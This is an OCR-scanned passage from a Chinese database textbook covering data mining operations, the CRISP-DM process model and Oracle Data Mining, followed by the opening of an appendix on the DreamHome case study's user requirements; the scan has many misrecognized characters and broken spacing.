在 每 个 神经 元 上 执行 输入 、 输 出 和 处 理 操作 。 在 可 见 的 输入 和 输出 层 之 间 有 一 些 隐蔽 的 处 理 
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层 。 一 层 中 的 每 一 处 理 单元 (圆圈 ) 加 权 连 接 到 下 一 层 的 每 一 处 理 单元 ， 权 值 表示 联系 的 强 
度 。 神 经 网 络 试图 通过 对 与 给 定数 据点 相关 的 所 有 变量 进行 算术 组 合 来 模仿 人 脑 的 识别 模 
式 。 使 用 这 种 方法 有 可 能 开发 出 非 线 性 的 预测 模型 ， 这 些 模型 是 通过 研究 变量 组 合 以 及 不 同 
的 变量 组 合 对 不 同 数 据 集 的 影响 来 进行 “学 习 ” 的 。 

值 预测 

值 预测 用 于 估计 与 某 个 数据 库 记 录 相 关联 的 连续 数值 。 这 一 技术 使 用 了 线性 回归 (linear 
regression) 和 非 线 性 回归 (nonlinear regression) 等 传统 的 统计 技术 。 由 于 这 些 技术 十 分 成 
熟 ， 相 对 来 讲 容易 使 用 和 理解 。 线 性 回归 试图 将 离散 的 数据 点 拟 合成 一 条 直线 ， 以 最 佳 地 表 
示 此 次 拟 合 中 所 有 观察 点 的 平均 值 。 线 性 回归 的 主要 问题 是 只 对 线性 数据 非常 有 效 ， 并 且 这 
种 方法 对 孤立 点 ( 即 与 期 望 的 标准 不 一 致 的 数据 值 ) 的 存在 十 分 敏感 。 尽 管 非 线性 回归 避免 
了 线性 回归 的 主要 问题 ,但 还 是 不 够 灵活 到 足以 处 理 所 有 可 能 形状 的 数据 图 。 这 也 就 是 传统 
统计 分 析 方 法 和 数据 挖掘 技术 的 不 同 之 处 。 统 计 度 量 擅长 构建 描述 预测 数据 点 的 线性 模型 ， 
然而 ， 现 实 中 的 大 部 分 数据 不 是 线性 的 。 数 据 挖掘 需要 一 些 可 以 适应 非 线性 、 有 和 孤立 点 和 非 
数值 数据 的 统计 方法 。 值 预测 的 应 用 包括 信用 卡 冒 用 检测 和 目标 邮件 列表 识别 。 


34.2.2 数据库 分 段 


数据 库 分 段 的 目的 是 将 数据 库 分 成 数目 不 定 的 含有 相似 记录 的 段 (segment) 或 徐 集 
(cluster)， 也 就 是 说 ， 每 段 中 的 记录 有 若干 相同 的 性 质 ， 故 被 认为 是 同 构 的 〈 段 一 般 都 有 很 
高 的 内 部 同 构 性 和 外 部 异 构 性 )。 这 种 方法 使 用 无 监督 学 习 ( unsupervised learning ) 来 发 现 
数据 库 中 同 构 的 成 分 以 提高 描述 的 精确 性 。 数 据 库 分 段 没 有 其 他 操作 精确 ， 因 此 对 元 余 和 不 
相关 特性 也 不 敏感 。 可 以 通过 忽略 某 些 所 有 实例 共有 的 属性 ， 或 给 每 个 变量 赋予 权 值 来 降低 
敏感 性 。 数 据 库 分 段 的 应 用 包括 顾客 归 类 描述 、 直 接 行销 和 跨 区 域 销 售 等 。 图 34-3 显示 了 
使 用 分 散 图 进行 数据 库 分 段 的 例子 。 
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图 34-3 ”使 用 分 散 图 进行 数据 库 分 段 


在 这 个 例子 中 ， 数 据 库 包 括 200 个 观察 数据 : 100 个 真 钞 和 100 个 伪钞 。 这 些 数据 都 是 六 
维 的， 每 一 维 对 应 于 钞票 尺寸 的 一 个 具体 度量 。 使 用 数据 库 分 段 ， 可 以 确定 对 应 真 伪钞 的 簇 
集 。 注 意 例子 中 有 两 个 包含 伪钞 的 篮 集 ， 说 明 至 少 有 两 批 人 在 制造 伪钞 (Girolami 等 人 ，1997 )。 

数据 库 分 段 与 人 口 统计 学 (demographic) 和 神经 聚 类 ( neural clustering) 两 种 技术 相关 ， 两 
者 的 区 别 在 于 允许 输入 的 数据 、 计 算 记录 间距 离 的 方法 和 用 于 分 析 的 分 段 结果 的 表示 方式 不 同 。 
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34.2.3 连接 分 析 


连接 分 析 旨 在 建立 数据 库 中 单个 记录 之 间或 记录 组 之 间 的 关联 associations)。 主 要 有 
三 种 连接 分 析 方 法 : 关联 发 现 (associations discovery)、 序 列 模式 发 现 ( sequential pattern 
discovery) 和 相似 时 间 序 列 发 现 (similar time sequence discovery ) 。 

关联 发 现 找 出 这 样 的 项 目 ， 它 们 隐 含 着 同一 事件 中 的 其 他 项 目 。 使 用 关联 规则 表示 项 
目 之 间 的 这 种 联系 。 例 如 ,“ 当 顾客 租房 多 于 两 年 且 年 龄 超过 25 岁 时 ， 他 购房 的 可 能 性 为 
40%。 而 在 所 有 租房 的 顾客 中 可 能 性 为 35%”。 

序列 模式 发 现 找 出 一 定时 间 间 隔 内 ， 事 件 库 中 某 一 组 项 目 跟随 另 一 组 项 目 出 现 的 模式 。 
例如 ， 这 种 方法 可 以 用 于 掌握 顾客 长 期 的 购买 行为 。 

相似 时 间 序 列 发 现 可 用 于 发 现时 间 相 关 的 两 个 数据 集合 的 关联 ， 这 种 发 现 主要 基于 两 个 
时 间 序 列 呈 现 出 的 模式 的 相似 度 。 例 如 ， 房 主 在 购房 后 三 个 月 内 ， 可 能 还 会 购买 炊具 、 冰 箱 
和 洗衣 机 。 

连接 分 析 的 应 用 包括 产品 关系 分 析 ， 直 接 行 销 和 股票 价格 变动 。 


34.2.4 ”偏离 检测 


在 所 有 商品 化 的 数据 挖掘 工具 中 ， 偏 离 检测 是 一 种 较 新 的 技术 。 然 而 ， 偏 离 检测 却 常 
和 常 是 真正 发 现 的 源头 ， 因 为 它 检测 到 孤立 点 ， 表 明 原 来 的 期 望 和 规范 有 偏离 。 这 个 操作 可 以 
使 用 统计 方法 ( statistics) 和 可 视 化 技术 ( visualization) 来 执行 ， 或 作为 数据 挖掘 的 副产品 。 
例如 ， 线 性 回归 方便 了 数据 中 孤立 点 的 检测 ， 现 代 的 可 视 化 技术 使 用 摘要 数据 和 图 形 表 示 ， 
同样 也 使 偏离 变 得 易于 发 现 。 在 图 34-4 中 ， 使 用 可 视 化 技术 显示 图 34-3 中 的 数据 。 偏 离 检 
测 应 用 包括 信用 卡 和 保险 申报 中 的 欺诈 检测 、 质 量 控 制 、 过 失 跟 踪 等 。 
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图 34-4 ”以 可 视 化 方式 表现 图 34-3 中 的 数据 


34.3 ”数据 挖掘 过 程 


由 于 认识 到 一 种 系统 化 的 方法 是 成 功 进行 数据 挖掘 的 关键 ， 很 多 经 销 商 和 咨询 机 构 都 定 
义 了 一 个 过 程 模型 ， 用 于 指导 用 户 (尤其 是 那些 建立 预测 性 模型 的 新 人 ) 通过 一 系列 步骤 得 
到 好 的 结果 。 在 1996 年 ， 一 个 由 哥本哈根 NCR 系统 工程 (丹麦 )、Daimler-Benz AG (德国 )、 
SPSS/Integral 公司 (英国 ) 和 OHRA Verzekeringen en Bank Groep BV (新 西 兰 ) 组 成 的 经 
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销 商用 户 协 会 开发 了 一 个 规范 ， 称 为 跨行 业 数据 挖掘 标准 流程 (CRISP-DM，Cross Industry 
Standard Process for Data Minning)。 

CRISP-DM 定义 了 一 套 对 所 有 行业 和 工具 通用 的 数据 挖掘 过 程 模型 。CRISP-DM 模型 由 
知识 发 现 过 程 演变 而 来 ， 它 在 工业 界 和 用 户 需求 直接 响应 中 被 广泛 采用 。CRISP-DM 的 主要 
设计 目标 是 使 大 规模 的 数据 挖掘 项 目 更 高 效 、 可 靠 并 易于 管理 ， 同 时 成 本 更 低廉 。 当 前 实用 
的 是 1.0 版 本 的 CRISP-DM， 本 节 将 对 这 一 模型 进行 简要 介绍 (CRISP-DM，1996 )。 


CRISP-DM 模型 


CRISP-DM 是 一 个 分 层 的 过 程 模 型 。 顶 层 包 括 六 个 不 同 的 基本 段 ， 从 业务 理解 到 项 目 结 
果 部 署 。 第 二 层 详细 描述 了 各 个 段 包含 的 基本 任务 ， 这 一 层 的 描述 将 覆盖 所 有 的 DM 情况 。 

第 三 层 考虑 这 些 任 务 的 特殊 化 情况 。 例 如 ， 若 基本 任务 为 清洗 数据 ， 特 殊 任 务 可 能 为 清 
洗 数 值 或 某 类 别 的 值 。 第 四 层 是 过 程 实例 ， 也 就 是 关于 操作 、 决 策 和 一 个 DM 项 目 实际 执行 
结果 的 记录 。 

这 一 模型 同样 讨论 了 不 同 的 DM 项 目 之 间 的 关系 ， 给 出 了 一 个 DM 项 目的 理想 执行 顺序 。 
然而 ， 它 并 不 试图 给 出 一 个 任务 所 有 可 能 的 执行 方案 。 模 型 中 的 不 同 阶段 如 表 34-3 所 示 。 

下 面 将 详细 介绍 CRISP-DM 模型 中 各 个 阶段 的 设计 目标 和 任务 之 间 的 关系 。 

业务 理解 这 一 阶段 的 主要 目标 是 从 业务 的 角度 理 表 34-3 CRISP-DM 模型 的 基本 阶段 
解 项 目的 目标 和 需求 ， 这 一 段 将 业务 问题 转换 为 数据 控 一 一 一 一 一 一 一 一 一 一 


阶 
掘 问题 定义 ， 并 为 整个 项 目 制订 初步 计划 。 包 括 的 任务 < 


有 : 决定 业务 目标 、 状 态 评估 、 确 定数 据 挖 掘 目标 并 提 ee 
出 项 目 计划 。 ee 
数据 理解 ”这 一 阶段 包括 收集 初始 数据 ， 确 定数 据 ee 


的 主要 特征 。 特 征 包括 数据 结构 、 数 据 质量 ,识别 感 兴 
趣 的 数据 子 集 。 这 一 阶段 包括 下 列 任务 : 收集 初始 数据 ， 
描述 数据 ， 探 察 数据 和 验证 数据 质量 。 = 
数据 准备 ”这 一 阶段 包括 构造 最 终 数 据 集 的 所 有 活动 ， 建 模 工具 要 在 此 数据 集 上 能 直 
接 使 用 。 这 一 阶段 的 不 同 任务 包括 : 选择 数据 、 清 洗 数 据 、 构 造 数 据 、 整 合 数据 和 标准 化 
数据 。 
建 模 ”这 一 阶段 执行 实际 的 数据 挖掘 操作 ， 包 括 选择 建 模 方 法 、 选 择 建 模 参 数 和 评估 所 
建 模型 。 这 一 阶段 包括 的 任务 有 : 选择 建 模 方法 ， 生 成 测试 方案 、 构 造 模型 和 评估 模型 。 
评估 这 一 阶段 从 数据 分 析 的 角度 验证 模型 。 在 实现 预定 业务 目标 的 上 下 文中 验证 模型 
和 建 模 步骤 。 这 一 阶段 涉及 的 任务 有 : 验证 结果 、 评 述 过 程 和 确定 下 一 步骤 。 
部 署 ” 从 模型 中 获得 的 知识 要 按照 业务 用 户 能 够 理解 的 方式 组 织 并 表示 出 来 。 部 署 阶段 
既 可 以 简单 到 只 生成 一 个 报告 ， 也 可 以 复杂 到 实现 整个 企业 的 可 重复 的 DM 过 程 。 通 常 业务 
用 户 执行 这 个 部 署 阶段 ， 涉 及 下 列 步骤 : 计划 部 署 、 计 划 监 控 和 维护 、 产 生 最 终 报告 并 进行 
告 评 述 。 
有 兴趣 的 读者 可 以 参阅 CRISP-DM ( 1996 ) 以 获得 有 关 该 模型 的 更 详细 描述 。 


34.4 数据 挖掘 工具 
市 场 上 不 断 涌现 出 越 来 越 多 的 数据 挖掘 商品 工具 。 数 据 挖掘 工具 的 重要 特性 包括 数据 准 


评估 
部 署 
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备 、 数 据 挖掘 操作 (算法 ) 选择、 产品 的 可 伸缩 性 和 性 能 ， 以 及 结果 理解 机 制 。 

数据 准备 ”数据 准备 是 数据 挖掘 过 程 中 最 耗 时 的 部 分 ， 一 个 工具 如 果 能 简化 这 一 处 理 过 
程 将 在 很 大 程度 上 加 速 模型 的 开发 进程 。 一 个 工具 能 够 提供 的 有 助 于 数据 准备 的 功能 包括 : 
数据 清洗 ， 如 处 理 丢失 的 数据 ; 数据 描述 ， 如 值 分 布 ; 数据 转换 ， 如 对 现 有 列 执行 计算 ; 为 
创建 训练 和 验证 数据 集 进 行 数据 采样 。 

数据 挖掘 操作 (算法 ) 选择 ”要 保证 一 个 数据 挖掘 工具 能 满足 用 户 需求 重要 的 是 了 解 其 
所 使 用 的 操作 (算法 ) 的 特性 。 尤 其 是 要 搞 清 楚 这 些 算 法 如 何 处 理 响应 和 预测 变量 的 数据 类 
型 、 它 们 训练 的 速度 以 及 在 新 数据 上 工作 的 快慢 (预测 变量 是 数据 库 中 的 一 列 ， 它 可 用 来 构 
建 一 个 预测 模型 ， 预 测 另 一 列 的 值 )。 

算法 的 另 一 个 重要 特征 是 它 对 噪声 的 敏感 程度 (噪声 即 一 个 模型 与 其 预期 之 间 的 差距 。 
有 时 如 果 数 据 中 包括 很 多 错误 ， 如 大 量 的 数据 丢失 或 存在 不 正确 的 值 ， 或 者 存在 元 余 的 列 ， 
就 称 这 些 数据 存在 噪声 )。 确 定 一 个 给 定 算法 对 数据 丢失 的 敏感 程度 以 及 该 算法 发 现 的 模式 
对 元 余 和 错误 数据 的 鲁 棒 性 是 非常 重要 的 。 

产品 可 伸缩 性 和 性 能 ” 若 要 寻找 一 个 能 够 处 理 按 行 和 列 数目 不 断 增加 数据 量 并 可 能 带 
有 验证 控制 的 挖掘 工具 ， 可 伸缩 性 和 性 能 是 关键 因素 。 在 满足 性 能 的 同时 要 提供 可 伸缩 性 可 
能 需要 调查 工具 能 否 使 用 SMP 或 者 MPP 技术 支持 并 行 处 理 。23.1.1 节 讨 论 过 采用 SMP 和 
MPP 技术 的 并 行 处 理 。 

结果 理解 机 制 ” 一 个 好 的 数据 挖掘 工具 应 该 提供 一 些 度量 方法 ， 帮助 用 户 理解 结果 ， 比 
如 用 一 些 实用 的 格式 〈 例 如 模糊 矩阵 ) 描述 精度 和 重要 性 ， 人 允许 用 户 对 结果 进行 灵敏 度 分 析 ， 
将 结果 用 可 选择 的 方式 表示 出 来 (例如 ,使 用 可 视 化 技术 )。 

模糊 矩阵 显示 了 实际 与 预测 类 值 的 计数 。 它 不 但 显示 了 模型 预测 的 优良 程度 ， 同 时 也 显 
示 了 出 现 问 题 确 切 需要 查看 的 细节 。 

灵敏 度 分 析 测 定 一 个 预测 模型 对 预测 值 中 的 一 个 小 波动 的 灵敏 程度 。 通 过 这 一 技术 ， 终 
端 用 户 能 够 度量 噪声 和 环境 改变 对 模型 预测 正确 性 的 影响 。 

用 可 视 化 的 图 形 显示 数据 能 够 帮助 用 户 更 好 地 理解 数据 的 含义 。 图 形 表示 可 从 简单 的 离 
散 图 像 到 复杂 的 多 维 图 形 。 


34.5 ”数据 挖掘 与 数据 仓库 


对 一 个 组 织 机 构 来 说 ， 利 用 数据 挖掘 技术 的 一 个 主要 挑战 是 找 出 合适 挖掘 的 数据 。 数 据 
挖掘 要 求 有 一 个 单一 、 独 立 、 干 兆 、 集 成 和 自身 相 容 的 数据 源 。 数 据 仓库 能 提供 适合 挖掘 的 
数据 ,原因 如 下 : 

e 为 保证 预测 模型 的 精确 性 、 数 据 质 量 和 一 致 性 是 挖掘 的 先决 条 件 。 数 据 仓库 中 存放 

的 都 是 干净 、 一 致 的 数据 。 
。 挖掘 从 多 个 数据 源 中 来 的 数据 ， 以 发 现 其 间 尽 可 能 多 的 关联 是 非常 有 利 的 。 数 据 仓 
库 中 包含 来 自若 干 源 的 数据 。 

。 选择 记录 和 字段 的 相关 子 集 进 行 挖掘 ， 需 要 数据 仓库 的 查询 能 力 。 

e 如 果 有 办 法 进一步 审查 一 些 未 发 现 的 模式 对 数据 挖掘 结果 的 研究 十 分 有 用 ， 而 数据 

仓库 提供 了 回 退 到 数据 源 的 能 力 。 

已 知 了 数据 挖掘 与 数据 仓库 的 这 些 互 补 性 ， 许 多 终端 用 户 正 在 探索 利用 数据 挖掘 与 数据 
仓库 技术 的 方式 。 
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34.6 Oracle Data Mining 


在 大 规模 数据 仓库 环境 下 ， 出 现 了 很 多 不 同类 型 的 分 析 技 术 。 除 了 SQL 查询 ， 还 可 以 对 
数据 采用 更 高 级 的 分 析 技 术 。 主 要 的 两 类 分 析 为 联机 分 析 处 理 (OLAP) 和 数据 挖掘 。 不 是 单 
独 存在 一 个 OLAP 或 数据 挖掘 引擎 ，Oracle 将 两 者 直接 整合 到 数据 库 服务 器 里 。Oracle OLAP 
和 Oracle Data Mining (ODM) 是 Oracle 数据 库 的 选 件 。33.6 节 曾 介绍 了 Oracle 对 OLAP 的 
支持 ， 本 节 将 介绍 Oracle 对 数据 挖掘 的 支持 。 


34.6.1 数据 挖掘 能 力 


Oracle 使 内 肉 在 数据 库 里 的 数据 挖掘 机 制 有 更 高 性 能 和 可 伸缩 性 。 部 分 能 力 概括 如 下 : 
。 能 提供 程序 化 控制 和 应 用 整合 的 一 套 API。 

带 OLAP 和 数据 库 统 计 功 能 的 分 析 能 力 。 

多 个 算法 : 朴素 贝 叶 斯 、 决 策 树 、 聚 类 和 聚合 规则 。 

实时 和 批 处 理 打 分 模式 。 

多 种 预测 类 型 。 

e 关联 分 析 。 


34.6.2 ”数据 挖掘 应 用 使 能 


Oracle Data Mining 提供 了 一 个 Java API， 便 于 利用 骨 人 在 Oracle 数据 库 中 的 数据 挖掘 
功能 。 通 过 提供 在 数据 挖掘 中 对 数据 库 的 完全 程序 化 控制 ，Oracle Data Mining ( ODM) 实 
现 了 功能 强大 的 可 伸缩 模型 和 实时 计 分 处 理 。 这 使 得 电子 商务 技术 在 整个 业务 周期 的 所 有 处 
理 过 程 和 判断 点 中 实现 了 预测 和 分 类 的 整合 。 

ODM 的 设计 是 为 了 满足 大 规模 数据 的 需要 ， 提 交 了 完全 整合 在 电子 商务 应 用 中 的 精确 
洞察 功能 。 这 一 整合 的 智能 使 电子 商务 具有 为 适应 当前 的 商业 环境 而 要 求 的 自动 控制 能 力 和 
决策 速度 。 


34.6.3 ”预测 和 洞察 


ODM 使 用 数据 挖掘 算法 筛选 电子 商务 中 产生 的 大 量 数 据 ， 以 产生 、 评 价 和 配置 预测 模 
型 。 它 也 丰富 了 下 面 这 些 领 域 的 关键 任务 应 用 ， 包 括 客户 关系 管理 ( Customer Relationship 
Management，CRM)、 制 造 控 制 、 库 存 管 理 、 客 户 服务 与 支持 、 网 站 门户 、 无 线 设备 和 其 他 
一 些 带 特定 上 下 文 建议 和 关键 过 程 预测 监控 的 领域 。ODM 能 实时 地 回答 如 下 一 类 的 问题 : 

。 个 人 A 最 可 能 购买 或 喜爱 的 NN 样 商 品 ? 

e 这 个 产品 的 返修 率 是 多 少 ? 


34.6.4 ”Oracle 数据 挖掘 环境 


Oracle Data Mining 环境 支持 在 数据 库 内 完成 数据 挖掘 的 所 有 阶段 。 对 每 一 阶段 ，ODM 
环境 都 在 性 能 、 自 动 化 和 整合 等 诸多 方面 有 所 提升 。 

数据 准备 

数据 准备 能 在 现 有 数据 基础 上 创建 新 的 表格 或 视图 。 这 两 种 选择 都 比 将 数据 移动 到 外 部 
的 数据 挖掘 实用 程序 要 快 ， 并 为 程序 员 提供 了 快照 或 实时 更 新 的 选择 。 

ODM 为 复杂 的 、 面 向 特定 任务 的 数据 挖掘 提供 了 支持 。 进 仓 技术 加 快 了 模型 构建 时 间 和 


盆 34 虽 发 据 花 所 417 


模型 性 能 ， 所 以 ODM 提供 了 一 个 实用 程序 支持 用 户 自 定义 进 仓 。ODM 以 单 记录 格式 或 事务 
格式 接收 数据 ， 在 事务 格式 上 挖掘 数据 。 在 应 用 中 普遍 存在 的 是 单 记录 格式 ， 因 此 ，ODM 
提供 了 一 个 实用 程序 将 数据 转换 成 单 记录 格式 。 

Oracle 的 统计 函数 和 OLAP 功能 扩展 了 准备 数据 探测 和 模型 评估 的 相关 分 析 技 术 。 因 为 
它们 也 就 在 数据 库 里 操作 ， 所 以 可 以 被 无 颖 整合 到 共享 数据 库 对 象 的 应 用 中 去 。 这 实现 了 对 
更 多 功能 的 支持 和 更 快速 地 应 用 。 

模型 构建 

Oracle Data Mining 提供 了 四 个 算法 : 朴素 贝 叶 斯 (Naive Bayes)、 决 策 树 、 聚 类 和 联合 
规则 。 这 些 算法 可 以 解决 广 谱 的 业务 问题 ， 从 预测 一 个 顾客 在 未 来 某 一 时 刻 购买 某 一 商品 的 
可 能 性 到 预测 顾客 在 一 次 商店 购物 中 可 能 会 同时 购买 哪些 商品 。 所 有 的 模型 构建 过 程 都 在 数 
据 库 内 进行 。 因 此 ， 在 模型 构建 中 无 须 将 数据 移出 数据 库 ， 这 加 速 了 整个 数据 挖掘 进程 。 

模型 评估 

Oracle 数据 挖掘 提供 了 批 处 理 和 实时 两 种 计 分 方式 。 采 用 批 处 理 方 式 时 ，ODM 输入 一 
个 表 。 然 后 为 其 每 个 记录 计 分 ， 最 后 返回 一 个 分 数 表 作为 结果 。 若 为 实时 处 理 方 式 ， 以 单一 
记录 作为 输入 参数 ， 得 分 以 Java 对 象 的 形式 返回 。 

ODM 在 两 种 方式 下 都 可 以 传递 多 种 计 分 。 它 可 以 返回 一 个 等 级 或 者 某 个 特定 结果 的 可 
能 性 ， 也 可 以 返回 一 个 预测 结果 和 该 结果 出 现 的 可 能 性 。. 

举例 包括 : 

该 事件 以 结果 A 结束 的 可 能 有 多 大 ? 

该 事件 最 可 能 得 到 的 结果 是 什么 ? 

该 事件 每 一 种 可 能 结果 的 可 能 性 是 多 少 ? 


34.6.5 ”Oracle 11g 中 的 数据 挖掘 特性 


ODM 是 Oracle Database 11g 的 一 个 选项 ， 它 使 您 能 够 轻松 构建 并 部 署 下 一 代 应 用 程序 ， 
这 些 应 用 程序 能 提供 预测 分 析 和 新 视角 。 应 用 程序 开发 人 员 可 以 通过 使 用 ODM 的 SQL 和 
Java API， 来 自动 挖掘 Oracle 数据 和 在 整个 企业 实时 部 署 结果 ， 从 而 快速 构建 下 一 代 应 用 程 
序 。 由 于 数据 、 模 型 和 结果 均 被 保留 在 Oracle 数据 库 中 ， 无 需 移动 数据 ， 安 全 性 得 到 最 大 
保障 ， 并 且 信 息 延 迟 最 小 化 。ODM 模型 可 以 包含 在 SQL 查询 中 或 敌人 在 应 用 程序 中 以 提供 
改进 的 商务 智能 。 

有 关 Oracle 数据 挖掘 的 更 多 详细 信息 可 访问 http://www.oracle.com。 


本 章 小 结 

e 数据 挖掘 ( data mining) 是 从 大 型 数据 库 中 提取 有 效 的 、 从 前 未 知 的 、 易 理解 的 、 有 依据 的 信息 ， 
并 使 用 这 些 信息 做 出 重要 业务 决策 的 过 程 。 

e 与 数据 挖掘 技术 关联 的 主要 有 四 种 操作 :预测 性 建 模 、 数 据 库 分 段 、 连 接 分 析 和 偏离 检测 。 

e@ 技术 是 这 些 数据 挖掘 操作 (算法 ) 的 特定 实现 。 每 种 操作 都 各 有 优 缺 点 。 

e@ 预测 性 建 模 (predictive modeling) 能 用 于 分 析 现 有 的 数据 库 以 发 现 该 数据 集 的 一 些 重要 特 伍 ( 模 
型 )。 该 模型 使 用 监督 学 习 (supervised learning) 法 构建 ， 包 括 两 个 阶段 : 训练 和 测试 。 预 测 性 建 
模 的 应 用 包括 客户 关系 管理 、 信 用 认可 、 跨 区 域 销售 和 直接 行销 等 领域 。 预 测 性 建 模 有 两 种 相关 技 
术 : 分 类 (classification) 和 值 预测 (value prediction ) 。 


418 ”入 九 部 分 商 姑 和 大 能 


数据 库 分 段 (database segmentation) 将 数据 库 分 成 数目 不 定 的 含有 相似 记录 的 段 (segment) 或 簇 集 
(cluster)。 这 种 方法 使 用 无 监督 学 习 (unsupervised learning) 来 发 现 数据 库 中 同 构 的 成 分 以 提高 描 
述 的 精确 性 。 

连接 分 析 (link analysis) 旨 在 建立 数据 库 中 单个 记录 之 间或 记录 组 之 间 的 连接 ， 称 为 关联 (associations) 。 
主要 有 三 种 特殊 的 连接 分 析 : 关联 发 现 (associations discovery)、 序 列 模 式 发 现 ( sequential pattern 
discovery) 和 相似 时 间 序 列 发 现 ( similar time sequence discovery)。 关 联 发 现 找 出 这 样 的 项 目 ， 它 
们 隐 含 着 同一 事件 中 的 其 他 项 目 。 序 列 模式 发 现 找 出 一 定时 间 间 隔 内 ， 事 件 库 中 某 一 组 项 目 跟随 另 
一 组 项 目 出 现 的 模式 。 相 似 时 间 序 列 发 现 可 用 于 发 现时 间 相 关 的 两 个 数据 集合 的 关联 ， 这 种 发 现 主 
要 基于 两 个 时 间 序 列 呈 现 出 的 模式 的 相似 度 。 

偏离 检测 ( deviation detection) 常常 是 真正 发 现 的 源头 ， 因 为 它 检 测 到 孤立 点 ， 表 明 原来 的 期 望 和 
规范 有 偏离 。 这 个 操作 可 以 使 用 统计 方法 (statistics) 和 可 视 化 技术 (visualization ) 来 执行 ， 或 作为 
数据 挖掘 的 副产品 。 

跨行 业 数 据 挖掘 标准 流程 ( Cross Industry Standard Process for Data Mining，CRISP-DM) 描述 了 一 
个 通用 的 数据 挖掘 处 理 模型 ， 它 不 针对 任 一 具体 行业 或 工具 。 

数据 挖掘 工具 的 重要 特征 包括 : 数据 准备 机 制 、 数 据 挖掘 操作 (算法 ) 选择 、 可 伸缩 性 和 性 能 以 及 
结果 理解 工具 。 

数据 仓库 能 很 好 地 为 挖掘 提供 数据 ， 因 为 它 不 但 保存 了 来 自 多 个 数据 源 的 高 质量 、 一 致 的 数据 ， 必 
要 时 它 还 可 以 提供 分 析 数 据 的 子 集 (视图 ) 以 及 源 数据 的 低层 细节 。 


思考 题 

34.1 讨论 何谓 数据 挖掘 。 

34.2 ”列举 数据 挖掘 的 应 用 实例 。 

34.3 ”描述 如 何 使 用 下 列 数据 挖掘 操作 ， 并 分 别 列举 典型 应 用 。 


(a) 预测 性 建 模 
(b) 数据 库 分 段 
(c) 连接 分 析 
(d) 偏离 检测 


34.4 描述 CRISP-DM 模型 的 主要 设计 目标 和 步骤 。 
34.5 用 实例 说 明 数 据 挖掘 工具 的 重要 特性 。 

34.6 ”讨论 数据 挖掘 与 数据 仓库 的 联系 。 

34.7 ”Oracle 怎样 支持 数据 挖掘 。 


习题 
34.8 ”考虑 像 DreamHome 这 样 的 公司 如 何 从 数据 挖掘 中 获 益 。 请 用 实例 说 明 在 DreamHome 中 使 用 哪 


些 数据 挖掘 操作 最 有 用 。 


34.9 ”调查 一 下 你 所 在 的 单位 (比如 你 所 在 的 大 学 /学 院 或 者 工作 组 ) 是 否 用 到 了 数据 挖 据 技术， 如果 


用 了 ， 那 么 这 些 数据 挖掘 工具 是 否 为 一 个 更 大 的 商务 智能 技术 体系 的 一 部 分 。 如 果 可 能 的 话 ， 
找 出 最 初 对 数据 挖掘 感 兴趣 的 原因 ， 说 明 怎 样 选 用 各 种 工具 以 及 最 后 是 否 实现 了 对 数据 挖掘 寄 
予 的 期 望 。 
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DreamHome 案例 研究 的 用 户 需 求 说 明 


| 本 附录 目标 

本 附录 我 们 主要 学 习 : 

@ 给 出 11.4 节 所 讨论 的 DreamHome 案例 研究 的 两 个 用 户 视图 Branch 和 Staff 的 数据 
需求 和 事务 需求 


本 附录 描述 了 DreamHome 数据 库 系 统 中 Branch 和 Staff 两 个 用 户 视 图 的 用 户 需 求 说 
明 。 每 个 视图 的 需求 都 包括 两 部 分 ,“ 数 据 需求 ”部 分 描述 了 用 到 的 数据 ,“ 数 据 事务 ”部 分 
给 出 了 使 用 数据 的 例子 。 


A.1 DreamHome 的 Branch 用 户 视图 
A.1.1 数据 需求 





DreamHome 的 分 公司 遍布 英国 的 所 有 城市 。 每 个 分 公司 分 得 的 员工 中 都 包括 一 名 经 理 ， 
他 管理 该 分 公司 的 运转 。 描 述 一 个 分 公司 的 数据 包括 唯一 的 分 公司 编号 、 地 址 (街道 、 城 市 
和 邮编 )、 电 话 号 码 (最 多 可 有 3 个 电话 号 码 ) 和 当前 管理 该 分 公司 的 员工 的 名 字 。 特 别 附加 
在 每 名 经 理 上 的 数据 包括 : 经 理 在 当前 分 公司 任职 的 日 期 ， 以 及 根据 他 每 月 在 房产 租赁 市 场 
的 业绩 获得 的 奖金 。 
员工 

担任 主管 工作 的 员工 负责 管理 本 组 内 其 他 助理 员工 的 日 常 活动 (每 组 最 多 10 人 )。 并 不 
是 所 有 员工 都 有 一 名 主管 。 为 每 个 员工 存储 的 数据 包括 员工 编号 、 地 址 、 职 务 、 工 资 和 主管 
名 字 ( 若 存在 的 话 ) 和 该 员工 当前 工作 的 分 公司 的 情况 。 员 工 编号 在 DreamHome 所 有 分 公 
司 内 都 是 唯一 的 。 
出 租 的 房产 

每 个 分 公司 提供 一 批 用 于 出 租 的 房产 。 为 每 处 房产 存储 的 数据 包括 房产 编号 、 地 址 〈 街 
道 、 城 市 和 邮编 )、 类 型 、 房 间 数目 、 每 月 租金 和 业主 情况 。 房 产 编 号 在 所 有 分 公司 内 都 是 
唯一 的 。 每 处 房产 分 派 给 一 位 员工 管理 ， 他 负责 处 理 房 产 出 租 的 有 关 事宜 。 任 何 时 候 一 位 员 
工 管理 的 房产 数目 最 多 不 超过 100 处 。 
业主 

业主 的 情况 同样 也 被 存储 起 来 。 业 主 有 两 种 主要 类 型 : 私人 业主 和 企业 业主 。 为 私人 业 
主 存储 的 数据 包括 业主 编号 、 名 字 、 地 址 和 电话 号 码 。 为 企业 业主 存储 的 数据 包括 企业 的 名 
称 、 企 业 的 类 型 、 地 址 、 电 话 号 码 和 联系 人 。 
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客户 

DreamHome 把 对 租房 感 兴 趣 的 人 称 为 客户 。 客 户 必须 首先 在 DreamHome 的 分 公司 注 
册 。 为 客户 存储 的 数据 包括 客户 编号 、 名 字 、 电 话 号 码 、 喜 欢 的 住所 类 型 和 客户 最 多 准备 支 
付 的 租金 。 同 时 还 存储 了 负责 的 员工 的 名 字 、 客 户 加 入 的 日 期 和 客户 注册 所 在 分 公司 的 某 些 
情况 。 客 户 编 号 在 DreamHome 所 有 分 公司 内 都 是 唯一 的 。 
租约 

当 房 产 出 租 时 ， 客 户 和 业主 之 间 就 会 草拟 一 份 租约 。 租 约 上 的 具体 数据 包括 租约 编号 、 
客户 编号 、 名 字 和 地 址 、 房 产 编号 和 地 址 、 每 月 租金 、 付 款 方法 、 定 金 是 否 支 付 (定金 是 月 
租 的 两 倍 )、 租 约 的 持续 时 间 ， 以 及 租约 开始 和 结束 的 日 期 。 
报纸 

需要 时 ， 在 当地 报纸 上 刊登 广告 介绍 出 租房 产 的 情况 。 存 储 的 数据 包括 房产 编号 、 地 
